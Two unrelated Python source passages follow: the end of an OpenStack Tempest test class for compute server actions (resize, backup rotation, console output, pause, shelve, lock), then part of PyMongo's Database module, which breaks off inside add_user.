@test.attr(type='smoke')
def test_resize_server_confirm(self):
self._test_resize_server_confirm(stop=False)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type='smoke')
def test_resize_server_confirm_from_stopped(self):
self._test_resize_server_confirm(stop=True)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type='gate')
def test_resize_server_revert(self):
# The server's RAM and disk space should return to its original
# values after a resize is reverted
previous_flavor_ref, new_flavor_ref = \
self._detect_server_image_flavor(self.server_id)
resp, server = self.client.resize(self.server_id, new_flavor_ref)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'VERIFY_RESIZE')
self.client.revert_resize(self.server_id)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, server = self.client.get_server(self.server_id)
self.assertEqual(previous_flavor_ref, server['flavor']['id'])
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting not available, backup not possible.')
@test.attr(type='gate')
def test_create_backup(self):
# Positive test:create backup successfully and rotate backups correctly
# create the first and the second backup
backup1 = data_utils.rand_name('backup-1')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup1)
oldest_backup_exist = True
# the oldest one should be deleted automatically in this test
def _clean_oldest_backup(oldest_backup):
if oldest_backup_exist:
try:
self.images_client.delete_image(oldest_backup)
except exceptions.NotFound:
pass
else:
LOG.warning("Deletion of oldest backup %s should not have "
"been successful as it should have been "
"deleted during rotation." % oldest_backup)
image1_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(_clean_oldest_backup, image1_id)
self.assertEqual(202, resp.status)
self.images_client.wait_for_image_status(image1_id, 'active')
backup2 = data_utils.rand_name('backup-2')
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup2)
image2_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(self.images_client.delete_image, image2_id)
self.assertEqual(202, resp.status)
self.images_client.wait_for_image_status(image2_id, 'active')
# verify they have been created
properties = {
'image_type': 'backup',
'backup_type': "daily",
'instance_uuid': self.server_id,
}
resp, image_list = self.images_client.image_list_detail(
properties,
sort_key='created_at',
sort_dir='asc')
self.assertEqual(200, resp.status)
self.assertEqual(2, len(image_list))
self.assertEqual((backup1, backup2),
(image_list[0]['name'], image_list[1]['name']))
# create the third one, due to the rotation is 2,
# the first one will be deleted
backup3 = data_utils.rand_name('backup-3')
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
resp, _ = self.servers_client.create_backup(self.server_id,
'daily',
2,
backup3)
image3_id = data_utils.parse_image_id(resp['location'])
self.addCleanup(self.images_client.delete_image, image3_id)
self.assertEqual(202, resp.status)
# the first back up should be deleted
self.images_client.wait_for_resource_deletion(image1_id)
oldest_backup_exist = False
resp, image_list = self.images_client.image_list_detail(
properties,
sort_key='created_at',
sort_dir='asc')
self.assertEqual(200, resp.status)
self.assertEqual(2, len(image_list),
'Unexpected number of images for '
'v3:test_create_backup; was the oldest backup not '
'yet deleted? Image list: %s' %
[image['name'] for image in image_list])
self.assertEqual((backup2, backup3),
(image_list[0]['name'], image_list[1]['name']))
def _get_output(self):
resp, output = self.servers_client.get_console_output(
self.server_id, 10)
self.assertEqual(200, resp.status)
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
self.assertEqual(lines, 10)
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
@test.attr(type='gate')
def test_get_console_output(self):
# Positive test:Should be able to GET the console output
# for a given server_id and number of lines
# This reboot is necessary for outputting some console log after
# creating a instance backup. If a instance backup, the console
# log file is truncated and we cannot get any console log through
# "console-log" API.
# The detail is https://bugs.launchpad.net/nova/+bug/1251920
resp, body = self.servers_client.reboot(self.server_id, 'HARD')
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
self.wait_for(self._get_output)
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
@test.attr(type='gate')
def test_get_console_output_server_id_in_shutoff_status(self):
# Positive test:Should be able to GET the console output
# for a given server_id in SHUTOFF status
# NOTE: SHUTOFF is irregular status. To avoid test instability,
# one server is created only for this test without using
# the server that was created in setupClass.
resp, server = self.create_test_server(wait_until='ACTIVE')
temp_server_id = server['id']
resp, server = self.servers_client.stop(temp_server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(temp_server_id, 'SHUTOFF')
self.wait_for(self._get_output)
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
@test.attr(type='gate')
def test_pause_unpause_server(self):
resp, server = self.client.pause_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'PAUSED')
resp, server = self.client.unpause_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@testtools.skipUnless(CONF.compute_feature_enabled.suspend,
'Suspend is not available.')
@test.attr(type='gate')
def test_suspend_resume_server(self):
resp, server = self.client.suspend_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'SUSPENDED')
resp, server = self.client.resume_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@test.attr(type='gate')
def test_shelve_unshelve_server(self):
resp, server = self.client.shelve_server(self.server_id)
self.assertEqual(202, resp.status)
offload_time = CONF.compute.shelved_offload_time
if offload_time >= 0:
self.client.wait_for_server_status(self.server_id,
'SHELVED_OFFLOADED',
extra_timeout=offload_time)
else:
self.client.wait_for_server_status(self.server_id,
'SHELVED')
resp, server = self.client.shelve_offload_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id,
'SHELVED_OFFLOADED')
resp, server = self.client.get_server(self.server_id)
image_name = server['name'] + '-shelved'
resp, images = self.images_client.image_list(name=image_name)
self.assertEqual(1, len(images))
self.assertEqual(image_name, images[0]['name'])
resp, server = self.client.unshelve_server(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
@test.attr(type='gate')
def test_stop_start_server(self):
resp, server = self.servers_client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, server = self.servers_client.start(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
@test.attr(type='gate')
def test_lock_unlock_server(self):
# Lock the server,try server stop(exceptions throw),unlock it and retry
resp, server = self.servers_client.lock_server(self.server_id)
self.assertEqual(202, resp.status)
resp, server = self.servers_client.get_server(self.server_id)
self.assertEqual(200, resp.status)
self.assertEqual(server['status'], 'ACTIVE')
# Locked server is not allowed to be stopped by non-admin user
self.assertRaises(exceptions.Conflict,
self.servers_client.stop, self.server_id)
resp, server = self.servers_client.unlock_server(self.server_id)
self.assertEqual(202, resp.status)
resp, server = self.servers_client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, server = self.servers_client.start(self.server_id)
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id, 'ACTIVE')
def _validate_url(self, url):
valid_scheme = ['http', 'https']
parsed_url = urlparse.urlparse(url)
self.assertNotEqual('None', parsed_url.hostname)
self.assertIn(parsed_url.scheme, valid_scheme)
@testtools.skipUnless(CONF.compute_feature_enabled.vnc_console,
'VNC Console feature is disabled')
@test.attr(type='gate')
def test_get_vnc_console(self):
# Get the VNC console
console_types = ['novnc', 'xvpvnc']
for console_type in console_types:
resp, body = self.servers_client.get_vnc_console(self.server_id,
console_type)
self.assertEqual(
200, resp.status,
"Failed to get Console Type: %s" % (console_type))
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
@testtools.skipUnless(CONF.compute_feature_enabled.spice_console,
'Spice Console feature is disabled.')
@test.attr(type='gate')
def test_get_spice_console(self):
# Get the Spice console of type "spice-html5"
console_type = 'spice-html5'
resp, body = self.servers_client.get_spice_console(self.server_id,
console_type)
self.assertEqual(200, resp.status)
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
@testtools.skipUnless(CONF.compute_feature_enabled.rdp_console,
'RDP Console feature is disabled.')
@test.attr(type='gate')
def test_get_rdp_console(self):
# Get the RDP console of type "rdp-html5"
console_type = 'rdp-html5'
resp, body = self.servers_client.get_rdp_console(self.server_id,
console_type)
self.assertEqual(200, resp.status)
self.assertEqual(console_type, body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
|
|
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.py3compat import iteritems, string_type, _unicode
from bson.son import SON
from pymongo import auth, common
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import _first_batch
from pymongo.read_preferences import ReadPreference
from pymongo.son_manipulator import SONManipulator
from pymongo.write_concern import WriteConcern
def _check_name(name):
"""Check if a database name is valid.
"""
if not name:
raise InvalidName("database name cannot be the empty string")
for invalid_char in [" ", ".", "$", "/", "\\", "\x00"]:
if invalid_char in name:
raise InvalidName("database names cannot contain the "
"character %r" % invalid_char)
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, client, name, codec_options=None,
read_preference=None, write_concern=None):
"""Get a database by client and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `client`: A :class:`~pymongo.mongo_client.MongoClient` instance.
- `name`: The database name.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) client.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) client.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) client.write_concern is used.
.. mongodoc:: databases
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
:class:`~pymongo.database.Database` no longer returns an instance
of :class:`~pymongo.collection.Collection` for attribute names
with leading underscores. You must use dict-style lookups instead::
db['__my_collection__']
Not:
db.__my_collection__
"""
super(Database, self).__init__(
codec_options or client.codec_options,
read_preference or client.read_preference,
write_concern or client.write_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if name != '$external':
_check_name(name)
self.__name = _unicode(name)
self.__client = client
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
**DEPRECATED** - `add_son_manipulator` is deprecated.
.. versionchanged:: 3.0
Deprecated add_son_manipulator.
"""
warnings.warn("add_son_manipulator is deprecated",
DeprecationWarning, stacklevel=2)
base = SONManipulator()
def method_overwritten(instance, method):
"""Test if this method has been overridden."""
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
"""
return SystemJS(self)
@property
def client(self):
"""The client instance for this :class:`Database`."""
return self.__client
@property
def name(self):
"""The name of this :class:`Database`."""
return self.__name
@property
def incoming_manipulators(self):
"""All incoming SON manipulators installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""All incoming SON copying manipulators installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
return (self.__client == other.client and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__client, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
raise AttributeError(
"Database has no attribute %r. To access the %s"
" collection, use database[%r]." % (name, name, name))
return self.__getitem__(name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def get_collection(self, name, codec_options=None,
read_preference=None, write_concern=None):
"""Get a :class:`~pymongo.collection.Collection` with the given name
and options.
Useful for creating a :class:`~pymongo.collection.Collection` with
different codec options, read preference, and/or write concern from
this :class:`Database`.
>>> db.read_preference
Primary()
>>> coll1 = db.test
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = db.get_collection(
... 'test', read_preference=ReadPreference.SECONDARY)
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `name`: The name of the collection - a string.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Database` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Database` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Database` is
used.
"""
return Collection(
self, name, False, codec_options, read_preference, write_concern)
def create_collection(self, name, codec_options=None,
read_preference=None, write_concern=None, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Database` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Database` is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Database` is
used.
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
.. versionchanged:: 2.2
Removed deprecated argument: options
"""
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, True, codec_options,
read_preference, write_concern, **kwargs)
def _apply_incoming_manipulators(self, son, collection):
"""Apply incoming manipulators to `son`."""
for manipulator in self.__incoming_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _apply_incoming_copying_manipulators(self, son, collection):
"""Apply incoming copying manipulators to `son`."""
for manipulator in self.__incoming_copying_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _fix_incoming(self, son, collection):
"""Apply manipulators to an incoming SON object before it gets stored.
:Parameters:
- `son`: the son object going into the database
- `collection`: the collection the son object is being saved in
"""
son = self._apply_incoming_manipulators(son, collection)
son = self._apply_incoming_copying_manipulators(son, collection)
return son
def _fix_outgoing(self, son, collection):
"""Apply manipulators to a SON object as it comes out of the database.
:Parameters:
- `son`: the son object coming out of the database
- `collection`: the collection the son object was saved in
"""
for manipulator in reversed(self.__outgoing_manipulators):
son = manipulator.transform_outgoing(son, collection)
for manipulator in reversed(self.__outgoing_copying_manipulators):
son = manipulator.transform_outgoing(son, collection)
return son
def _command(self, sock_info, command, slave_ok=False, value=1, check=True,
allowable_errors=None, read_preference=ReadPreference.PRIMARY,
codec_options=CodecOptions(), **kwargs):
"""Internal command helper."""
if isinstance(command, string_type):
command = SON([(command, value)])
command.update(kwargs)
return sock_info.command(self.__name,
command,
slave_ok,
read_preference,
codec_options,
check,
allowable_errors)
def command(self, command, value=1, check=True,
allowable_errors=None, read_preference=ReadPreference.PRIMARY,
codec_options=CodecOptions(), **kwargs):
"""Issue a MongoDB command.
Send command `command` to the database and return the
response. If `command` is an instance of :class:`basestring`
(:class:`str` in python 3) then the command {`command`: `value`}
will be sent. Otherwise, `command` must be an instance of
:class:`dict` and will be sent as is.
Any additional keyword arguments will be added to the final
command document before it is sent.
For example, a command like ``{buildinfo: 1}`` can be sent
using:
>>> db.command("buildinfo")
For a command where the value matters, like ``{collstats:
collection_name}`` we can do:
>>> db.command("collstats", collection_name)
For commands that take additional arguments we can use
kwargs. So ``{filemd5: object_id, root: file_root}`` becomes:
>>> db.command("filemd5", object_id, root=file_root)
:Parameters:
- `command`: document representing the command to be issued,
or the name of the command (for simple commands only).
.. note:: the order of keys in the `command` document is
significant (the "verb" must come first), so commands
which require multiple keys (e.g. `findandmodify`)
should use an instance of :class:`~bson.son.SON` or
a string and kwargs instead of a Python `dict`.
- `value` (optional): value to use for the command verb when
`command` is passed as a string
- `check` (optional): check the response for errors, raising
:class:`~pymongo.errors.OperationFailure` if there are any
- `allowable_errors`: if `check` is ``True``, error messages
in this list will be ignored by error-checking
- `read_preference`: The read preference for this operation.
See :mod:`~pymongo.read_preferences` for options.
- `codec_options`: A :class:`~bson.codec_options.CodecOptions`
instance.
- `**kwargs` (optional): additional keyword arguments will
be added to the command document before it is sent
.. note:: :meth:`command` does **not** obey :attr:`read_preference`
or :attr:`codec_options`. You must use the `read_preference` and
`codec_options` parameters instead.
.. versionchanged:: 3.0
Removed the `as_class`, `fields`, `uuid_subtype`, `tag_sets`,
and `secondary_acceptable_latency_ms` option.
Removed `compile_re` option: PyMongo now always represents BSON
regular expressions as :class:`~bson.regex.Regex` objects. Use
:meth:`~bson.regex.Regex.try_compile` to attempt to convert from a
BSON regular expression to a Python regular expression object.
Added the `codec_options` parameter.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionchanged:: 2.3
Added `tag_sets` and `secondary_acceptable_latency_ms` options.
.. versionchanged:: 2.2
Added support for `as_class` - the class you want to use for
the resulting documents
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: commands
"""
client = self.__client
with client._socket_for_reads(read_preference) as (sock_info, slave_ok):
return self._command(sock_info, command, slave_ok, value,
check, allowable_errors, read_preference,
codec_options, **kwargs)
def _list_collections(self, sock_info, slave_okay, criteria=None):
"""Internal listCollections helper."""
criteria = criteria or {}
if sock_info.max_wire_version > 2:
cmd = SON([("listCollections", 1), ("cursor", {})])
if criteria:
cmd["filter"] = criteria
coll = self["$cmd"]
cursor = self._command(sock_info, cmd, slave_okay)["cursor"]
return CommandCursor(coll, cursor, sock_info.address)
else:
coll = self["system.namespaces"]
res = _first_batch(sock_info, coll.full_name,
criteria, 0, slave_okay,
CodecOptions(), ReadPreference.PRIMARY)
data = res["data"]
cursor = {
"id": res["cursor_id"],
"firstBatch": data,
"ns": coll.full_name,
}
# Need to tell the cursor how many docs were in the first batch.
return CommandCursor(coll, cursor, sock_info.address, len(data))
def collection_names(self, include_system_collections=True):
"""Get a list of all the collection names in this database.
:Parameters:
- `include_system_collections` (optional): if ``False`` list
will not include system collections (e.g ``system.indexes``)
"""
with self.__client._socket_for_reads(
ReadPreference.PRIMARY) as (sock_info, slave_okay):
results = self._list_collections(sock_info, slave_okay)
names = [result["name"] for result in results]
if sock_info.max_wire_version <= 2:
# MongoDB 2.4 and older return index namespaces and collection
# namespaces prefixed with the database name.
names = [n[len(self.__name) + 1:] for n in names
if n.startswith(self.__name + ".") and "$" not in n]
if not include_system_collections:
names = [name for name in names if not name.startswith("system.")]
return names
def drop_collection(self, name_or_collection):
"""Drop a collection.
:Parameters:
- `name_or_collection`: the name of a collection to drop or the
collection object itself
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, string_type):
raise TypeError("name_or_collection must be an "
"instance of %s" % (string_type.__name__,))
self.__client._purge_index(self.__name, name)
self.command("drop", _unicode(name), allowable_errors=["ns not found"])
def validate_collection(self, name_or_collection,
scandata=False, full=False):
"""Validate a collection.
Returns a dict of validation info. Raises CollectionInvalid if
validation fails.
With MongoDB < 1.9 the result dict will include a `result` key
with a string value that represents the validation results. With
MongoDB >= 1.9 the `result` key no longer exists and the results
are split into individual fields in the result dict.
:Parameters:
- `name_or_collection`: A Collection object or the name of a
collection to validate.
- `scandata`: Do extra checks beyond checking the overall
structure of the collection.
- `full`: Have the server do a more thorough scan of the
collection. Use with `scandata` for a thorough scan
of the structure of the collection and the individual
documents. Ignored in MongoDB versions before 1.9.
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, string_type):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (string_type.__name__,))
result = self.command("validate", _unicode(name),
scandata=scandata, full=full)
valid = True
# Pre 1.9 results
if "result" in result:
info = result["result"]
if info.find("exception") != -1 or info.find("corrupt") != -1:
raise CollectionInvalid("%s invalid: %s" % (name, info))
# Sharded results
elif "raw" in result:
for _, res in iteritems(result["raw"]):
if "result" in res:
info = res["result"]
if (info.find("exception") != -1 or
info.find("corrupt") != -1):
raise CollectionInvalid("%s invalid: "
"%s" % (name, info))
elif not res.get("valid", False):
valid = False
break
# Post 1.9 non-sharded results.
elif not result.get("valid", False):
valid = False
if not valid:
raise CollectionInvalid("%s invalid: %r" % (name, result))
return result
def current_op(self, include_all=False):
"""Get information on operations currently running.
:Parameters:
- `include_all` (optional): if ``True`` also list currently
idle operations in the result
"""
coll = self.get_collection(
"$cmd.sys.inprog", read_preference=ReadPreference.PRIMARY)
if include_all:
return coll.find_one({"$all": True})
else:
return coll.find_one()
def profiling_level(self):
"""Get the database's current profiling level.
Returns one of (:data:`~pymongo.OFF`,
:data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
result = self.command("profile", -1)
assert result["was"] >= 0 and result["was"] <= 2
return result["was"]
def set_profiling_level(self, level, slow_ms=None):
"""Set the database's profiling level.
:Parameters:
- `level`: Specifies a profiling level, see list of possible values
below.
- `slow_ms`: Optionally modify the threshold for the profile to
consider a query or operation. Even if the profiler is off queries
slower than the `slow_ms` level will get written to the logs.
Possible `level` values:
+----------------------------+------------------------------------+
| Level | Setting |
+============================+====================================+
| :data:`~pymongo.OFF` | Off. No profiling. |
+----------------------------+------------------------------------+
| :data:`~pymongo.SLOW_ONLY` | On. Only includes slow operations. |
+----------------------------+------------------------------------+
| :data:`~pymongo.ALL` | On. Includes all operations. |
+----------------------------+------------------------------------+
Raises :class:`ValueError` if level is not one of
(:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
:data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
if not isinstance(level, int) or level < 0 or level > 2:
raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
if slow_ms is not None and not isinstance(slow_ms, int):
raise TypeError("slow_ms must be an integer")
if slow_ms is not None:
self.command("profile", level, slowms=slow_ms)
else:
self.command("profile", level)
def profiling_info(self):
"""Returns a list containing current profiling information.
.. mongodoc:: profiling
"""
return list(self["system.profile"].find())
def error(self):
"""**DEPRECATED**: Get the error if one occurred on the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("Database.error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getlasterror")
error_msg = error.get("err", "")
if error_msg is None:
return None
if error_msg.startswith("not master"):
# Reset primary server and request check, if another thread isn't
# doing so already.
primary = self.__client.primary
if primary:
self.__client._reset_server_and_request_check(primary)
return error
def last_status(self):
"""**DEPRECATED**: Get status information from the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
Returns a SON object with status information.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("last_status() is deprecated",
DeprecationWarning, stacklevel=2)
return self.command("getlasterror")
def previous_error(self):
"""**DEPRECATED**: Get the most recent error on this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
Only returns errors that have occurred since the last call to
:meth:`reset_error_history`. Returns None if no such errors have
occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("previous_error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getpreverror")
if error.get("err", 0) is None:
return None
return error
def reset_error_history(self):
"""**DEPRECATED**: Reset the error history of this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
Calls to :meth:`previous_error` will only return errors that have
occurred since the most recent call to this method.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("reset_error_history() is deprecated",
DeprecationWarning, stacklevel=2)
self.command("reseterror")
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Database' object is not iterable")
next = __next__
def _default_role(self, read_only):
"""Return the default user role for this database."""
if self.name == "admin":
if read_only:
return "readAnyDatabase"
else:
return "root"
else:
if read_only:
return "read"
else:
return "dbOwner"
def _create_or_update_user(
self, create, name, password, read_only, **kwargs):
"""Use a command to create (if create=True) or modify a user.
"""
opts = {}
if read_only or (create and "roles" not in kwargs):
warnings.warn("Creating a user with the read_only option "
"or without roles is deprecated in MongoDB "
">= 2.6", DeprecationWarning)
opts["roles"] = [self._default_role(read_only)]
elif read_only:
warnings.warn("The read_only option is deprecated in MongoDB "
">= 2.6, use 'roles' instead", DeprecationWarning)
if password is not None:
# We always salt and hash client side.
if "digestPassword" in kwargs:
raise ConfigurationError("The digestPassword option is not "
"supported via add_user. Please use "
"db.command('createUser', ...) "
"instead for this option.")
opts["pwd"] = auth._password_digest(name, password)
opts["digestPassword"] = False
# Don't send {} as writeConcern.
if self.write_concern.acknowledged and self.write_concern.document:
opts["writeConcern"] = self.write_concern.document
opts.update(kwargs)
if create:
command_name = "createUser"
else:
command_name = "updateUser"
self.command(command_name, name, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
"""Uses v1 system to add users, i.e. saving to system.users.
"""
user = self.system.users.find_one({"user": name}) or {"user": name}
if password is not None:
user["pwd"] = auth._password_digest(name, password)
if read_only is not None:
user["readOnly"] = read_only
user.update(kwargs)
# We don't care what the _id is, only that it has one
# for the replace_one call below.
user.setdefault("_id", ObjectId())
coll = self.system.users
if not self.write_concern.acknowledged:
coll = coll.with_options(write_concern=WriteConcern())
try:
coll.replace_one({"_id": user["_id"]}, user, True)
except OperationFailure as exc:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
if 'login' in str(exc):
pass
# First admin user add fails gle from mongos 2.0.x
# and 2.2.x.
elif (exc.details and
'getlasterror' in exc.details.get('note', '')):
pass
else:
raise
def add_user(self, name, password=None, read_only=None, **kwargs):
"""Create user `name` with password `password`.
Add a new user with permissions for this :class:`Database`.
.. note:: Will change the password if user `name` already exists.
:Parameters:
- `name`: the name of the user to create
- `password` (optional): the password of the user to create. Can not
be used with the ``userSource`` argument.
- `read_only` (optional): if ``True`` the user will be read only
- `**kwargs` (optional): optional fields for the user document
(e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
`<http://docs.mongodb.org/manual/reference/privilege-documents>`_
for more information.
.. note:: The use of optional keyword arguments like ``userSource``,
``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0
.. versionchanged:: 2.5
Added kwargs support for optional fields introduced in MongoDB 2.4
.. versionchanged:: 2.2
Added support for read only users
"""
if not isinstance(name, string_type):
raise TypeError("name must be an "
"instance of %s" % (string_type.__name__,))
if password is not None:
if not isinstance(password, string_type):
raise TypeError("password must be an "
"instance of %s" % (string_type.__name__,))
if len(password) == 0:
raise ValueError("password can't be empty")
if read_only is not None:
read_only = common.validate_boolean('read_only', read_only)
if 'roles' in kwargs:
raise ConfigurationError("Can not use "
"read_only and roles together")
try:
uinfo = self.command("usersInfo", name)
# Create the user if not found in uinfo, otherwise update one.
self._create_or_update_user(
(not uinfo["users"]), name, password, read_only, **kwargs)
